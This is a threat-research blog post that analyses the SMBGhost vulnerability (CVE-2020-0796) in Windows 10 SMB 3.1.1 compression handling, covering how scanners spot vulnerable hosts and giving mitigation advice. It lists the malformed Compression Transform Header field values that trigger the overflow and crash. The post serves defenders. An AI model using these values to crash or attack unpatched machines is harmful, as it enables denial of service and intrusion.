Blog Post

‘SMBGhost’ Wormable Vulnerability Analysis (CVE-2020-0796)

On 03/12/20, Microsoft released an official advisory about a critical flaw in the SMB 3.1.1 protocol stack implementation. This vulnerability in the code is due to handling certain requests and response messages that could let an attacker perform Remote Code Execution in the context of the SYSTEM user. Exploiting the flaw requires a specially crafted SMB v3 “Compression Transform Header” Request or Response PDU. This flaw was assigned CVE-2020-0796 and is being labeled SMBGhost or CoronaBlue. CVE-2020-0796 affects a specific set of Windows 10 based devices with build versions 1903 and 1909. At this time we believe Windows 7 and prior are not impacted by this vulnerability.

To identify devices impacted security professionals can use the “winver” command-line utility. The screenshot below provides a breakdown of Windows 10 versions and their corresponding build IDs, highlighting the vulnerable versions.

At the time of writing this post, a query in Shodan identified over 35K potentially vulnerable and internet-accessible devices.

This bug is considered critical because it doesn’t require any authentication between the attacker and the victim. Additionally, this vulnerability could affect either the client or the server end of the communication.

Publicly available scanners and exploit code seems to focus on two goals:

  • Identifying targets (pre-crash phase) based on SMB protocol request and response behavior
  • Triggering the (integer) buffer overflow itself by sending malformed PDU

In the rest of the blog, we will dive into each of these and provide context on what triggers the bug and how different OSes (vulnerable and non-vulnerable) behave against these exploits. PCAPs including attack traffic are available for download and further research.

Technical Analysis

Identifying potential targets

This can be achieved by identifying whether the target host supports Data Compression. Based on the echoed back response data, it is possible to identify targets that are exploitable by this flaw, and those that are not. When an SMB server, receives a certain Negotiation request asking for its compression capabilities, it triggers a Negotiate Response Header, from the SMB server with the following information:

  • Supported dialects (SMB server version running on the target OS)
  • Negotiate Contexts Count
    • The server sends Negotiate contexts only if the Connection Dialect has been set to v3.1.1 (vulnerable dialect). More details about SMB 3.1.1 are available here.

The PCAP analysis below shows how different OSes behave in response to the same request.

Windows 7 (non-vulnerable)

Negotiate Protocol Response (smb2.cmd == 0 && smb2.flags.response == 1)

Dialect (2 Bytes): 0x0210 (SMB 2.1)
NegotiateContextCount (2 bytes): 0x0000

The screenshot below demonstrates the scanning behavior when a non-vulnerable host is found:

Windows 10 (vulnerable)

Negotiate Protocol Response (smb2.cmd == 0 && smb2.flags.response == 1)

Dialect (2 Bytes): 0x0311 (SMB 3.1.1)
NegotiateContextCount (2 bytes): 0x0200

The screenshot below demonstrates the scanning behavior when a vulnerable host is found:

Next, let’s understand how the vulnerability is triggered and what causes the blue screen of death (BSOD) on the target machine.

Triggering the Buffer Overflow and Crash

To trigger the crash on the target machine, the client must send an SMB2 Compression Transform Header PDU. Below is a detailed breakdown of the malicious compression request:

ProtocolID (4 bytes): 0xFC534D42 (must)
OriginalSize (4 bytes): Length of compressed SMB3 Data (variable)
CompressionAlgorithm (2 bytes): LZNT1 (must be set to 0x0001)
Reserved (2 bytes): 0xFFFF
Offset (4 bytes): 0xFFFFFFFF (Higher value, -1 as signed long)

The screenshot below demonstrates the attack data used that causes the crash:

Impact and Mitigation

According to Microsoft, this flaw could lead to arbitrary remote code execution and could also be used by malware as a potential wormable component. We believe that wide exploitation is likely to occur fairly quickly. There are also some parallels with past attacks such as WannaCry (ShadowBroker), even though the exploitation techniques used in that case were different. Given the exploitation techniques are out, we anticipate lateral movement as well as for spreading ransomware and other threats including some of the COVID-19 themed malware we are already observing.
Awake recommends patching all devices immediately per the official Microsoft advisory. Also, avoid exposing SMB service discovery to external networks through firewall policies. In addition, if patching is not an option, consider the registry changes recommended in the Microsoft advisory to disable SMB compression as a mitigating factor.

References

 

Sujit Ghosal
Sujit Ghosal

Sr. Threat Researcher